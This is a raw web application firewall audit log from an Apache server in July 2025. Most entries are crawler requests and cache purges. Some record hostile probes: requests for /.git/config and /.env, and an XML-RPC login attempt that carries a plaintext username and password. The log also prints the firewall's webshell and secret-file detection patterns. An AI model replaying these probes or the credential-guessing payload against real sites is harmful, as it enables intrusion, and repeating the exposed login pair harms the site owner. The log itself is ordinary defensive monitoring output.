-) Stopwatch2: 1751323969971200 1645630; combined=2188, p1=86, p2=1919, p3=0, p4=0, p5=183, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0b5b1f00-Z-- --e9ebca7d-A-- [01/Jul/2025:04:22:52.742550 +0530] aGMVROTp8IZEWNkIVLLSpAAAABo 20.171.207.232 47240 192.168.74.40 443 --e9ebca7d-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/aainag/images/Rajasthan-Travel-Guides/hotels-Mount-Abu.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e9ebca7d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323972728362 14388 (- - -) Stopwatch2: 1751323972728362 14388; combined=2917, p1=125, p2=2672, p3=0, p4=0, p5=120, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e9ebca7d-Z-- --21d91419-A-- [01/Jul/2025:04:22:52.852761 +0530] aGMVQ_9EZv1_DBVMumTd6QAAAA0 103.185.74.40 14508 192.168.74.40 443 --21d91419-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --21d91419-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21d91419-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323971828557 1024621 (- - -) Stopwatch2: 1751323971828557 1024621; combined=2326, p1=101, p2=2107, p3=0, p4=0, p5=117, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --21d91419-Z-- --b7496a5f-A-- [01/Jul/2025:04:22:53.951056 +0530] aGMVReTp8IZEWNkIVLLSpQAAABo 20.171.207.232 47240 192.168.74.40 443 --b7496a5f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/aainag/aainag/https/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b7496a5f-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --02eb151a-Z-- --03a6d30a-A-- [01/Jul/2025:04:34:48.466816 +0530] aGMYEEd1D9b-FQbCkIxvnAAAACM 43.157.170.126 39974 192.168.74.40 80 --03a6d30a-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --03a6d30a-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --03a6d30a-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751324688456949 10397 (- - -) Stopwatch2: 1751324688456949 10397; combined=6100, p1=203, p2=5527, p3=154, p4=2, p5=213, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --03a6d30a-Z-- --b1135509-A-- [01/Jul/2025:04:34:49.434411 +0530] aGMYESEe3SaLIRqvXn3XUgAAAA4 20.171.207.232 58906 192.168.74.40 443 --b1135509-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b1135509-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b1135509-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326980463001 17226 (- - -) Stopwatch2: 1751326980463001 17226; combined=3622, p1=170, p2=3308, p3=0, p4=0, p5=144, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9760d60b-Z-- --ee8b4f22-A-- [01/Jul/2025:05:13:00.717279 +0530] aGMhAy-UNe2XKzId6FX_QAAAABQ 103.185.74.40 28188 192.168.74.40 443 --ee8b4f22-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ee8b4f22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ee8b4f22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326979530243 1187711 (- - -) Stopwatch2: 1751326979530243 1187711; combined=2299, p1=100, p2=2032, p3=0, p4=0, p5=166, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ee8b4f22-Z-- --b5493d32-A-- [01/Jul/2025:05:13:01.681677 +0530] aGMhBUCdC-9uZ5gLti8M3wAAAAU 20.171.207.232 33884 192.168.74.40 443 --b5493d32-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/js/Rajasthan-Travel-Guides/https/aaina/1/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b5493d32-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326981843745 17069 (- - -) Stopwatch2: 1751326981843745 17069; combined=3944, p1=533, p2=3246, p3=0, p4=0, p5=165, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3a8b200b-Z-- --ac36076e-A-- [01/Jul/2025:05:13:02.078064 +0530] aGMhBHDXYcRntxraQPA_YAAAABY 103.185.74.40 37324 192.168.74.40 443 --ac36076e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ac36076e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ac36076e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751326980931940 1146933 (- - -) Stopwatch2: 1751326980931940 1146933; combined=2298, p1=91, p2=2000, p3=0, p4=0, p5=207, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ac36076e-Z-- --83bd6f07-A-- [01/Jul/2025:05:13:02.877591 +0530] aGMhBkCdC-9uZ5gLti8M4AAAAAU 20.171.207.232 33884 192.168.74.40 443 --83bd6f07-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/js/Rajasthan-Travel-Guides/https/aaina/1/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --83bd6f07-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327086651479 14661 (- - -) Stopwatch2: 1751327086651479 14661; combined=3252, p1=127, p2=3002, p3=0, p4=0, p5=122, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --33d57719-Z-- --b25ce602-A-- [01/Jul/2025:05:14:48.097313 +0530] aGMhbi8ql_RkmkmikEjGZQAAAAo 103.185.74.40 2197 192.168.74.40 443 --b25ce602-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b25ce602-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b25ce602-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327086937011 1160758 (- - -) Stopwatch2: 1751327086937011 1160758; combined=2131, p1=115, p2=1816, p3=0, p4=0, p5=200, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b25ce602-Z-- --57760d22-A-- [01/Jul/2025:05:14:49.572693 +0530] aGMhcAsE3OEvYP7qC5bcKwAAAAQ 103.185.74.40 43076 192.168.74.40 443 --57760d22-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --57760d22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --57760d22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327088310584 1262472 (- - -) Stopwatch2: 1751327088310584 1262472; combined=2153, p1=103, p2=1900, p3=0, p4=0, p5=150, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --57760d22-Z-- --2d1ba232-A-- [01/Jul/2025:05:14:51.831852 +0530] aGMhccOVmx8tBrnWNrtvNAAAAAw 8.218.212.177 53208 192.168.74.40 80 --2d1ba232-B-- POST /xmlrpc.php HTTP/1.1 Host: sritelugu.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Content-Length: 230 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, zstd, deflate, br Accept-Language: he-IL,he;q=0.9 Content-Type: application/xml Referer: http://sritelugu.com --2d1ba232-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>sriteluguastro</string></value></param><param><value><string>sriteluguastro@123</string></value></param></params></methodCall> --2d1ba232-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a201c941-Z-- --3f052269-A-- [01/Jul/2025:05:17:46.261773 +0530] aGMiIi8ql_RkmkmikEjGkQAAAAo 167.99.81.70 38604 192.168.74.40 443 --3f052269-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --3f052269-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3f052269-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327266219304 42656 (- - -) Stopwatch2: 1751327266219304 42656; combined=3367, p1=101, p2=3117, p3=0, p4=0, p5=149, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3f052269-Z-- --0b96f374-A-- [01/Jul/2025:05:17:46.553892 +0530] aGMiIt7RqqsV2xX5nMS5PQAAACY 20.171.207.232 40644 192.168.74.40 443 --0b96f374-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0b96f374-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0b96f374-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/images/aainag/Rajasthan-Travel-Guides/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327266537169 16909 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0b96f374-Z-- --b524c57d-A-- [01/Jul/2025:05:17:47.279225 +0530] aGMiI4dPpucRv_12QtD47QAAAAk 167.99.81.70 47108 192.168.74.40 443 --b524c57d-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --b524c57d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b524c57d-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327267241699 37830 (- - -) Stopwatch2: 1751327267241699 37830; combined=670, p1=78, p2=448, p3=0, p4=0, p5=143, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b524c57d-Z-- --ac003d72-A-- [01/Jul/2025:05:17:47.799099 +0530] aGMiI97RqqsV2xX5nMS5PgAAACY 20.171.207.232 40644 192.168.74.40 443 --ac003d72-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ac003d72-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ac003d72-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751327267732093 67311 (- - -) Stopwatch2: 1751327267732093 67311; combined=2722, p1=159, p2=2418, p3=0, p4=0, p5=144, sr=55, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --41987e2c-Z-- --fb742306-A-- [01/Jul/2025:05:25:35.191049 +0530] aGMj9wfrbmM1v3nD-8VJRwAAABo 165.22.97.213 36802 192.168.74.40 80 --fb742306-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 TE: Trailers --fb742306-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --fb742306-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751327735187319 5169 (- - -) Stopwatch2: 1751327735187319 5169; combined=1034, p1=132, p2=539, p3=0, p4=0, p5=363, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fb742306-Z-- --86ad7a41-A-- [01/Jul/2025:05:25:36.334195 +0530] aGMj-BBa0N-Z4nT7y60emwAAABk 20.171.207.232 57078 192.168.74.40 443 --86ad7a41-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --86ad7a41-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --86ad7a41-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751330693051432 25049 (- - -) Stopwatch2: 1751330693051432 25049; combined=3317, p1=121, p2=3047, p3=0, p4=0, p5=149, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --45f2b861-Z-- --0c0d8074-A-- [01/Jul/2025:06:14:54.145461 +0530] aGMvhCBqNKRCSqeD5YuOyQAAACg 103.185.74.40 27675 192.168.74.40 443 --0c0d8074-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0c0d8074-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0c0d8074-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ 